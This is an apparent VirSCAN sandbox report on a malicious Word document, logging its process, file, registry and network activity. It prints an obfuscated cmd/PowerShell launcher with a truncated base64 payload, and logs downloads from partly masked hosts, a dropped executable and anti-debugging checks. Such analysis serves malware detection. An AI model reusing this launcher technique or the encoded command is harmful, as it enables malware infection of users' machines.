VirSCAN VirSCAN

1, You can UPLOAD any files, but there is 20Mb limit per file.
2, VirSCAN supports Rar/Zip decompression, but it must be less than 20 files.
3, VirSCAN can scan compressed files with password 'infected' or 'virus'.

Language
Server load
Server Load
文件信息
安全评分 :30
基本信息
MD5:5f04521febc6fd82c896a192a3b2bf43
文件类型:Microsoft Office Word(doc)文档
出品公司:
版本:
壳或编译器信息:
关键行为
行为描述:跨进程写入数据
详情信息:TargetProcess = C:\Windows\System32\cmd.exe, WriteAddress = 0x00050000, Size = 0x00000020 TargetPID = 0x00000ab8
TargetProcess = C:\Windows\System32\cmd.exe, WriteAddress = 0x00050020, Size = 0x00000034 TargetPID = 0x00000ab8
TargetProcess = C:\Windows\System32\cmd.exe, WriteAddress = 0x7ffdf238, Size = 0x00000004 TargetPID = 0x00000ab8
TargetProcess = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, WriteAddress = 0x00050000, Size = 0x00000020 TargetPID = 0x00000adc
TargetProcess = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, WriteAddress = 0x00050020, Size = 0x00000034 TargetPID = 0x00000adc
TargetProcess = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, WriteAddress = 0x7ffdb238, Size = 0x00000004 TargetPID = 0x00000adc
进程行为
行为描述:隐藏窗口创建进程
详情信息:ImagePath = , CmdLine = cmd /V /C "set %uihIioasd%=powers&&set %rGgiuGU%=hell&&!%uihIioasd%!!%rGgiuGU%! -e IAAuACAAKAAgACQAUwBIAGUAbABMAEkAZABbADEAXQArACQAcwBoAGUATABMAGkAZABbADEAMwBdACsAJwB4ACcAKQAgACgAWwBTAFQAcgBJAG4AZwBdADoAOgBKAG8AaQBuACgAJwAnACwAKAAoACAAMwA2ACAALAAxADEAOQAsADEA
行为描述:创建进程
详情信息:[0x00000ab8]ImagePath = C:\Windows\System32\cmd.exe, CmdLine = cmd /V /C "set %uihIioasd%=powers&&set %rGgiuGU%=hell&&!%uihIioasd%!!%rGgiuGU%! -e IAAuACAAKAAgACQAUwBIAGUAbABMAEkAZABbADEAXQArACQAcwBoAGUATABMAGkAZABbADEAMwBdACsAJwB4ACcAKQAgACgAWwBTAFQAcgBJAG4AZwBdADoAOgBKAG8AaQBuACgAJwAnACwAKAAoACAAMwA2ACAALAAxADEAOQAsADEA
[0x00000adc]ImagePath = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, CmdLine = powershell -e IAAuACAAKAAgACQAUwBIAGUAbABMAEkAZABbADEAXQArACQAcwBoAGUATABMAGkAZABbADEAMwBdACsAJwB4ACcAKQAgACgAWwBTAFQAcgBJAG4AZwBdADoAOgBKAG8AaQBuACgAJwAnACwAKAAoACAAMwA2ACAALAAxADEAOQAsADEAMQA1ACwAIAA5ADkAIAAsACAAMQAxADQAIAAsADEAMAA1ACAALAAgADEAMQAyACAALAAg
行为描述:枚举进程
详情信息:N/A
行为描述:跨进程写入数据
详情信息:TargetProcess = C:\Windows\System32\cmd.exe, WriteAddress = 0x00050000, Size = 0x00000020 TargetPID = 0x00000ab8
TargetProcess = C:\Windows\System32\cmd.exe, WriteAddress = 0x00050020, Size = 0x00000034 TargetPID = 0x00000ab8
TargetProcess = C:\Windows\System32\cmd.exe, WriteAddress = 0x7ffdf238, Size = 0x00000004 TargetPID = 0x00000ab8
TargetProcess = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, WriteAddress = 0x00050000, Size = 0x00000020 TargetPID = 0x00000adc
TargetProcess = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, WriteAddress = 0x00050020, Size = 0x00000034 TargetPID = 0x00000adc
TargetProcess = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, WriteAddress = 0x7ffdb238, Size = 0x00000004 TargetPID = 0x00000adc
文件行为
行为描述:创建文件
详情信息:C:\Users\Administrator\AppData\Local\Temp\~DFF4B7AE57236D685D.TMP
C:\Users\Administrator\AppData\Roaming\Microsoft\Templates\~$Normal.dot
C:\Users\Administrator\AppData\Local\Temp\~DFC6C3F38440D6A02B.TMP
C:\Users\Administrator\AppData\Local\%temp%\****.doc
C:\Users\Administrator\AppData\Local\Temp\~WRF0000.tmp
C:\Users\Administrator\AppData\Roaming\Microsoft\Office\%temp%\****.LNK
C:\Users\Administrator\AppData\Roaming\Microsoft\Office\%temp%.LNK
C:\Users\Administrator\AppData\Local\GDIPFONTCACHEV1.DAT
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QS5RQGNN7P2QED83M4DB.temp
C:\Users\Administrator\AppData\Local\Temp\43951.exe
行为描述:查找文件
详情信息:FileName = C:\Program Files\Common Files\Microsoft Shared\office11
FileName = C:\Program Files\Common Files\Microsoft Shared\office11\mso.dll
FileName = C:\Program Files\Common Files\Microsoft Shared\office11\*.*
FileName = C:\Program Files
FileName = C:\Program Files\Microsoft Office
FileName = C:\Program Files\Microsoft Office\OFFICE11\Normal.dot
FileName = C:\Users\Administrator\AppData\Roaming\Microsoft\Templates\Normal.dot
FileName = C:\Users\Administrator\AppData\Local\%temp%\****.doc
FileName = C:\Users\Administrator
FileName = C:\PROGRA~1
FileName = C:\PROGRA~1\COMMON~1
FileName = C:\PROGRA~1\COMMON~1\MICROS~1
FileName = C:\PROGRA~1\COMMON~1\MICROS~1\VBA
FileName = C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA6
FileName = C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL
行为描述:删除文件
详情信息:C:\Users\Administrator\AppData\Local\Temp\~DFF4B7AE57236D685D.TMP
C:\Users\Administrator\AppData\Local\Temp\~DFC6C3F38440D6A02B.TMP
C:\Users\Administrator\AppData\Local\Temp\43951.exe
行为描述:复制文件
详情信息:C:\PROGRA~2\MICROS~1\OFFICE\DATA\OPA11.BAK ---> C:\PROGRA~2\MICROS~1\OFFICE\DATA\opa11.dat
行为描述:重命名文件
详情信息:C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QS5RQGNN7P2QED83M4DB.temp ---> C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
行为描述:修改文件内容
详情信息:C:\Users\Administrator\AppData\Roaming\Microsoft\Templates\~$Normal.dot ---> Offset = 0
C:\Users\Administrator\AppData\Roaming\Microsoft\Templates\~$Normal.dot ---> Offset = 54
C:\Users\Administrator\AppData\Local\%temp%\****.doc ---> Offset = 0
C:\Users\Administrator\AppData\Local\%temp%\****.doc ---> Offset = 54
C:\Users\Administrator\AppData\Roaming\Microsoft\Office\%temp%\****.LNK ---> Offset = 0
C:\Users\Administrator\AppData\Roaming\Microsoft\Office\Recent\index.dat ---> Offset = 80
C:\Users\Administrator\AppData\Roaming\Microsoft\Office\%temp%.LNK ---> Offset = 0
C:\Users\Administrator\AppData\Roaming\Microsoft\Office\Recent\index.dat ---> Offset = 40
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QS5RQGNN7P2QED83M4DB.temp ---> Offset = 0
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QS5RQGNN7P2QED83M4DB.temp ---> Offset = 4096
网络行为
行为描述:建立到一个指定的套接字连接
详情信息:URL: ha****nl, IP: **.133.40.**:80, SOCKET = 0x00000570
URL: ex****za, IP: **.133.40.**:80, SOCKET = 0x00000598
URL: ja****hk, IP: **.133.40.**:80, SOCKET = 0x00000598
URL: ep****jp, IP: **.133.40.**:80, SOCKET = 0x00000598
URL: as****om, IP: **.133.40.**:80, SOCKET = 0x00000598
行为描述:发送HTTP包
详情信息:GET /uQMrDsW/ HTTP/1.1 Host: ha****nl Connection: Keep-Alive
GET /NdFRZfSjL/ HTTP/1.1 Host: ex****za Connection: Keep-Alive
GET /Qen/ HTTP/1.1 Host: ja****hk Connection: Keep-Alive
GET /qwtoKLVhe/ HTTP/1.1 Host: ep****jp Connection: Keep-Alive
GET /DqrESMyO/ HTTP/1.1 Host: as****om Connection: Keep-Alive
行为描述:按名称获取主机地址
详情信息:GetAddrInfoW: ha****nl
GetAddrInfoW: ex****za
GetAddrInfoW: ja****hk
GetAddrInfoW: ep****jp
GetAddrInfoW: as****om
注册表行为
行为描述:修改注册表
详情信息:\REGISTRY\USER\S-*\Software\Microsoft\Office\11.0\Word\Resiliency\StartupItems\ 
\REGISTRY\USER\S-*\Software\Microsoft\Office\11.0\Word\MTTT
\REGISTRY\USER\S-*\Software\Microsoft\Office\11.0\Word\Resiliency\StartupItems\ !
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\4080110900063D11C8EF10054038389C\Usage\WORDFiles
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\4080110900063D11C8EF10054038389C\Usage\ProductFiles
\REGISTRY\USER\S-*\Software\Microsoft\Office\11.0\Word\Resiliency\StartupItems\E$
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\4080110900063D11C8EF10054038389C\Usage\VBAFiles
\REGISTRY\USER\S-*\Software\Microsoft\Office\11.0\Common\ReviewCycle\ReviewToken
\REGISTRY\USER\S-*\Software\Microsoft\Office\11.0\Word\Resiliency\DocumentRecovery\22717\22717
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\4080110900063D11C8EF10054038389C\Usage\WordEngWizDotFiles2
\REGISTRY\USER\S-*\Software\Microsoft\GDIPlus\FontCachePath
\REGISTRY\USER\S-*\Software\Microsoft\Office\Common\Assistant\CurrAsstState
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\4080110900063D11C8EF10054038389C\Usage\SpellingAndGrammarFiles_1033
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\EnableFileTracing
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\EnableConsoleTracing
行为描述:删除注册表键值
详情信息:\REGISTRY\USER\S-*\Software\Microsoft\Office\11.0\Word\Resiliency\StartupItems\ !
\REGISTRY\USER\S-*\Software\Microsoft\Office\11.0\Word\Resiliency\StartupItems\E$
\REGISTRY\USER\S-*\Software\Microsoft\Office\11.0\Word\Resiliency\StartupItems\ 
行为描述:删除注册表键
详情信息:\REGISTRY\USER\S-*\Software\Microsoft\Office\11.0\Word\Resiliency\StartupItems\
其他行为
行为描述:检测自身是否被调试
详情信息:IsDebuggerPresent
行为描述:创建互斥体
详情信息:Local\Mutex_MSOSharedMem
Local\Mso97SharedDg19211105606Mutex
Local\Mso97SharedDg20321105606Mutex
Global\MTX_MSO_Formal1_S-*
Global\MTX_MSO_AdHoc1_S-*
Local\Mso97SharedDg19521105606Mutex
Skd5yLHImeSCMutextCfgPersist_H_S-*
Local\Mso97SharedDg19531105606Mutex
_SHuassist.mtx
Local\SqmSysTray
OfficeAssistantStateMutex
RasPbFile
Global\.net clr networking
KYIMEShareCachedData.MutexObject.Administrator
KYTransactionServer.MutexObject.Administrator
行为描述:创建事件对象
详情信息:EventName = PrimaryWord11Mutex
EventName = OleDfRootAE6B93CA3D8110BC
EventName = OleDfRootB919A15882F74E68
EventName = OleDfRoot4E8B4574DCBD7C93
EventName = Global\CorDBIPCSetupSyncEvent_2780
行为描述:窗口信息
详情信息:Pid = 2460, Hwnd=0x401b2, Text = MsoDockTop, ClassName = MsoCommandBarDock.
Pid = 2460, Hwnd=0x501d4, Text = 格式, ClassName = MsoCommandBar.
Pid = 2460, Hwnd=0x40184, Text = 常用, ClassName = MsoCommandBar.
Pid = 2460, Hwnd=0x801d2, Text = 菜单栏, ClassName = MsoCommandBar.
Pid = 2460, Hwnd=0x90152, Text = b70c, ClassName = _WwB.
Pid = 2460, Hwnd=0x501e8, Text = MSO Generic Control Container, ClassName = MsoCommandBar.
Pid = 2460, Hwnd=0x50170, Text = MSO Generic Control Container, ClassName = MsoCommandBar.
Pid = 2460, Hwnd=0x501dc, Text = Microsoft Word 文档, ClassName = _WwG.
Pid = 2460, Hwnd=0xa015c, Text = b70c - Microsoft Word, ClassName = OpusApp.
行为描述:查找指定窗口
详情信息:NtUserFindWindowEx: [Class,Window] = [MSOBALLOON,]
NtUserFindWindowEx: [Class,Window] = [MsoHelp10,]
NtUserFindWindowEx: [Class,Window] = [AgentAnim,]
NtUserFindWindowEx: [Class,Window] = [CicLoaderWndClass,]
NtUserFindWindowEx: [Class,Window] = [Shell_TrayWnd,]
行为描述:打开事件
详情信息:Local\MSCTF.CtfActivated.Default1
Local\MSCTF.AsmCacheReady.Default1
\KernelObjects\MaximumCommitCondition
MSFT.VSA.COM.DISABLE.2460
MSFT.VSA.IEC.STATUS.6c736db0
Global\TermSrvReadyEvent
Global\CLR_PerfMon_StartEnumEvent
\KernelObjects\LowMemoryCondition
\SECURITY\LSA_AUTHENTICATION_INITIALIZED
MSFT.VSA.COM.DISABLE.2780
Global\SvcctrlStartEvent_A3752DX
行为描述:调整进程token权限
详情信息:SE_DEBUG_PRIVILEGE
行为描述:枚举窗口
详情信息:N/A
行为描述:隐藏指定窗口
详情信息:[Window,Class] = [,_WwB]
行为描述:打开互斥体
详情信息:Local\Mutex_MSOSharedMem
Local\Mso97SharedDg19211105606Mutex
Local\Mso97SharedDg20321105606Mutex
Local\MU_ACBPIDS08
Local\MSCTF.Asm.MutexDefault1
Global\MTX_MSO_Formal1_S-*
Global\MTX_MSO_AdHoc1_S-*
Local\Mso97SharedDg19521105606Mutex
Local\Mso97SharedDg19531105606Mutex
Global\CLR_CASOFF_MUTEX
Local\SqmSysTray
OfficeAssistantStateMutex
RasPbFile
Global\.net clr networking
行为描述:导入密钥
详情信息:[CryptImportKey] Algorithm: CALG_RSA_SIGN (0x00002400), Data: 0x001FE69C, DataLen: 148, Flags: 0x00000000
[CryptImportKey] Algorithm: CALG_RSA_SIGN (0x00002400), Data: 0x0040FDAC, DataLen: 148, Flags: 0x00000000
[CryptImportKey] Algorithm: CALG_RSA_SIGN (0x00002400), Data: 0x00447804, DataLen: 148, Flags: 0x00000000
[CryptImportKey] Algorithm: CALG_RSA_SIGN (0x00002400), Data: 0x004478AC, DataLen: 148, Flags: 0x00000000
[CryptImportKey] Algorithm: CALG_RSA_SIGN (0x00002400), Data: 0x015F8BA7, DataLen: 148, Flags: 0x00000000
[CryptImportKey] Algorithm: CALG_RSA_SIGN (0x00002400), Data: 0x0040FDA4, DataLen: 148, Flags: 0x00000000
[CryptImportKey] Algorithm: CALG_RSA_SIGN (0x00002400), Data: 0x040EA0D7, DataLen: 148, Flags: 0x00000000
[CryptImportKey] Algorithm: CALG_RSA_SIGN (0x00002400), Data: 0x0040FD9C, DataLen: 148, Flags: 0x00000000
[CryptImportKey] Algorithm: CALG_RSA_SIGN (0x00002400), Data: 0x00447B4C, DataLen: 148, Flags: 0x00000000
[CryptImportKey] Algorithm: CALG_RSA_SIGN (0x00002400), Data: 0x03D04663, DataLen: 148, Flags: 0x00000000
[CryptImportKey] Algorithm: CALG_RSA_SIGN (0x00002400), Data: 0x03D13783, DataLen: 148, Flags: 0x00000000
[CryptImportKey] Algorithm: CALG_RSA_SIGN (0x00002400), Data: 0x00447D44, DataLen: 148, Flags: 0x00000000
[CryptImportKey] Algorithm: CALG_RSA_SIGN (0x00002400), Data: 0x0043AA14, DataLen: 148, Flags: 0x00000000
[CryptImportKey] Algorithm: CALG_RSA_SIGN (0x00002400), Data: 0x00447F3C, DataLen: 148, Flags: 0x00000000
运行截图
VirSCAN

About VirSCAN | Privacy Policy | Contact us | link | Help VirSCAN
Translated by Keith Miller, United States
Powered By CentOSpol

京ICP备11007605号-12

京公网安备 11010802020746号